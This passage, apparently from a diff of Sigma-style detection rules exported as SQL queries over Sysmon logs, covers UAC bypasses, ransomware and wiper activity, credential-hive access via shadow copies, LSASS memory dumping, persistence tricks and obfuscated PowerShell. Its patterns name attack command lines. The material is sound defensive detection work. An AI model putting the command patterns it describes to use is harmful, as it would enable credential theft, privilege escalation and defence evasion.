LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", - "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": 
"c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "status": "test", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Sensitive Registry Access via Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Some rare backup scenarios" + 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", - "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. 
This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": "test", + "description": 
"Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "Suspicious Compression Tool Parameters", - "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Suspicious DumpMinitool Execution", + "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + 
"attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "status": "test", - "description": "load malicious registered COM objects", - "author": "frack113", + "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + 
"author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image 
File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", - "status": "test", - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", + "status": "experimental", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": "proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Change Default File Association To Executable Via Assoc", - "id": 
"ae6f14e6-14de-45b0-9f44-c0986f50dc89", - "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "status": "test", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Suspicious Windows Defender Registry 
Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.009" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR 
CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR 
CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "description": "Office application called wmic to proxye execution through a LOLBIN process. 
This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian 
